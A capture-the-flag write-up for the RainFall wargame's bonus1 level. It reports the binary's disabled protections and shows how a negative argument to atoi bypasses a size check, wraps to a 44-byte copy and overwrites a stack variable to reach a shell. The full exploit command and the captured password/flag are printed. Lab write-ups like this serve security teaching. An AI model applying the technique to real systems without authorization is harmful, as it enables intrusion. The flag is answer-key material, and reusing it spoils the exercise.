After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/bonus1/bonus1
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 bonus2 users 5043 Mar  6  2016 bonus1
```
Using `objdump` and `radar` tools find out that there is only one function inside - `main`.
![alt text](./Resources/main_1.png "main_1 function")
![alt text](./Resources/main_2.png "main_2 function")
![alt text](./Resources/main_3.png "main_3 function")

There is `execl("/bin/sh")` call, to fall inside this code - I need to override variable content on the stack. This variable lays after char buffer - which is 40 bytes long. So first argument should be 11 (11 * 4 = 44), second argument - payload with required variable content (`0x574f4c46`).

Because the first argument validated and should be less or equal `9`, but I figured out that code isn't protected from negative `atoi` argument. So if I will put a negative argument - later it will be converted to `size_t` (`size_t(-2147483637 * 4) == 44`).

Exploit:
```
bonus1@RainFall:~$ ./bonus1 -2147483637 $(python -c "print 'A' * 40 + '\x46\x4C\x4F\x57' ")$ cat /home/user/bonus2/.pass
579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245
```

Flag: `579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245`